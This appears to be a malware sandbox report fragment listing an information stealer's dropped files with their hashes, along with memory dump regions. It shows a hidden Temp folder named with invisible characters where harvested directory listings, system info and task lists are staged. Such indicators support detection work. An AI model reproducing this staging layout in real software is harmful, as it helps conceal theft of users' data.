C:\Users\Admin\AppData\Local\Temp\   ​  ‎   \Display (1).png

MD5 87393664cdcc018e0651613ac8c2dac9
SHA1 099ee6c7a5b65355a1712719e1770fc5ec767d7b
SHA256 ed8f053254f03e1f9d2b262fec9bf36edaab935a179d50f7dec60bede7c6911f
SHA512 53988b060f96b952352bffe64d517d8d0f82119c7e5593221a697ce31a104e4dbf43f132db6d5ff3a10bf8cd63c2a5dd4797e3f8a6ef2821a7fb01d898b26e25

C:\Users\Admin\AppData\Local\Temp\   ​  ‎   \Directories\Videos.txt

MD5 e140e10b2b43ba6f978bee0aa90afaf7
SHA1 bbbeb7097ffa9c2daa3206b3f212d3614749c620
SHA256 c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618
SHA512 df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

C:\Users\Admin\AppData\Local\Temp\   ​  ‎   \Directories\Pictures.txt

MD5 6530968aa22c3f1719db74236282ddbf
SHA1 f219a9d0756796d20608c84c2b80554bd8cb277e
SHA256 2b0946a11e59e4a8631463ab21f230f7d417b47cbce6a8dc517645e3efd9fef0
SHA512 dd02d6228356485ad5df83ad9bcdb0f0fbc0d4b19625c3176ad9391e0820a085dba843c1cfb837107329a741d1c75ebddb216f3669edcc59fc3462818d80adc3

C:\Users\Admin\AppData\Local\Temp\   ​  ‎   \Directories\Music.txt

MD5 1e14f6d525ced3279fe629aed063429a
SHA1 909892724eb0f7a73db8726546b00b62c519e7fe
SHA256 c6b374392c031875ef56132b8dea8a6e3acc938f7c6a710905ee3b725b6766d3
SHA512 e79725957ac983bacfc3d8114a1bdf6644e42e142cad0a665860acdb07ab362bfe4c4b4e932cd89b5795fbae9cfa1570a8415c4d748941ea3bb4b051d69ff124

C:\Users\Admin\AppData\Local\Temp\   ​  ‎   \Directories\Downloads.txt

MD5 a6c17592ce0f3235e89f42c8faba08d4
SHA1 853e0924ae03b7784299103c4db08bba90bb60dd
SHA256 910ebfbbe2b984777b48a32ffbea473afffd631c7601f6c559dc2d6a6ec7863b
SHA512 5227131d2ff89d17caa37b5bd027a317e745235788abe3968cdcc0f4dc205e749b6e41e3dfcc10ae2b8db93eb936195baab4f4cbfc145fe0c6c3a2adf8fa1576

C:\Users\Admin\AppData\Local\Temp\   ​  ‎   \Directories\Documents.txt

MD5 3b88658e33c842943000a1c4df1bad1d
SHA1 a3d9fdf3e32a0b82de380ac4cd5e274bdb513975
SHA256 5b2127372485940b91f40798df5182c314b20eef9c89d2e7ef19259b690e03e6
SHA512 faf165d278d60feeccc2ed95677b02d7cda7ee3c7cb1ccb617f8e40ae0c2f1893ad2546325bcf8dd2f671b0dcfaf73954824a9e74027c2823bafc83a79494c7e

C:\Users\Admin\AppData\Local\Temp\   ​  ‎   \System\MAC Addresses.txt

MD5 ae3df1602c6b6124ba1ea2dd242d2622
SHA1 398a828cae01fa3c9b5fe4ec51c81c903c4e4d1b
SHA256 6021f29f11eed78a5438edef612743520d7a72b5a16ab9c2094827363fe13f1b
SHA512 d20930c2325b2874885151881d62979632d16154183720d668ec9e300b77e5f9143fe5fb4f6572261f5e522d73e9865de114c9884316a490b56171743b35a4ef

C:\Users\Admin\AppData\Local\Temp\   ​  ‎   \System\System Info.txt

MD5 bb78ec3e54916cfad87c8620d4a705e6
SHA1 458e08823cd29f68f2d465a6d7eec2879f85d049
SHA256 fb611673c8c02bf66d323a5c66e76f75df231e01242d8133dbba186b824e2ccc
SHA512 60455f1fab0c35572d65e8c24533fc2a2ea58395032509d37ce656a96b2ba5f0f8533b517f98262a3eefb1e0aa2d9d1ace1f3c08ab2767f5af6da713587cbe72

C:\Users\Admin\AppData\Local\Temp\   ​  ‎   \System\Task List.txt

MD5 f197ef2507482817c526e67653546f89
SHA1 2afaaca068b9152f365d8672ff22d2b71f4334c8
SHA256 3891c53f9031420027f37acb2ee3bff63d510fd02f546d4ec30ba79fc8df52a6
SHA512 e8595d26e7db9f29e72bda1e142efc84fc8a1c51662544f71ecf6dbd41548cdc50ff3384738bc02805d2b3cb649e130f9368df22637c176e04226be0d85f85e2

C:\Users\Admin\AppData\Local\Temp\geNAr.zip

MD5 8c97e7ad5a8ef7ac029d7b5a24f93f99
SHA1 41b89f6eb37a5e29f79a5544cbc3c84d77f472e8
SHA256 9675b4f3b289982dd4545a6dcc8ccc1d87fc187c3afe29846ef0939b22fc5b09
SHA512 edfa914528209e2ea48dcab91cf45cf0f3082a5b02e689093baa1cb406e742a700c309f5da2bb95878f84f4d8b821a9ebc493b29aeedf05f9d5123bb1c1d55f4

memory/212-176-0x00007FFA00170000-0x00007FFA00194000-memory.dmp

memory/212-184-0x00007FF9ECA00000-0x00007FF9ECA33000-memory.dmp

memory/212-189-0x00007FF9EB820000-0x00007FF9EB93C000-memory.dmp

memory/212-186-0x00007FF9EAA10000-0x00007FF9EAF39000-memory.dmp

memory/212-175-0x00007FF9EBCB0000-0x00007FF9EC2A2000-memory.dmp

memory/212-185-0x00007FF9EAF40000-0x00007FF9EB00D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

memory/212-212-0x00007FF9EBCB0000-0x00007FF9EC2A2000-memory.dmp

memory/212-236-0x00007FF9EAF40000-0x00007FF9EB00D000-memory.dmp

memory/212-237-0x00007FF9EAA10000-0x00007FF9EAF39000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI49922\blank.aes

MD5 4ee0a30fb1d788c9434d7610d7c3031c
SHA1 0bcc1d2897d3d4da3f944fd7150d0110178f29fc
SHA256 7535b2a2d8d883d4472edaeb3724853396a77243efdc679d81da5d61e87bfaab
SHA512 c836ad8ab66d972b40bf31a4b7d34b62ce48baf0c3f45e6c039363acb44e04a9201fa78c74c0b536f5dad67610b1365291f2c40ef70afa7a76d013c3a4819c0b

memory/212-235-0x00007FF9ECA00000-0x00007FF9ECA33000-memory.dmp

memory/212-234-0x00007FF9FDA50000-0x00007FF9FDA5D000-memory.dmp

memory/212-233-0x00007FF9FB000000-0x00007FF9FB019000-memory.dmp

memory/212-232-0x00007FF9EB5D0000-0x00007FF9EB74E000-memory.dmp

memory/212-231-0x00007FF9FB020000-0x00007FF9FB043000-memory.dmp

memory/212-230-0x00007FF9FB0D0000-0x00007FF9FB0E9000-memory.dmp

memory/212-229-0x00007FF9FB0F0000-0x00007FF9FB11D000-memory.dmp

memory/212-228-0x00007FFA00EE0000-0x00007FFA00EEF000-memory.dmp

memory/212-227-0x00007FFA00170000-0x00007FFA00194000-memory.dmp

memory/212-226-0x00007FF9EB820000-0x00007FF9EB93C000-memory.dmp

memory/212-225-0x00007FF9FD960000-0x00007FF9FD96D000-memory.dmp

memory/212-224-0x00007FF9FA620000-0x00007FF9FA634000-memory.dmp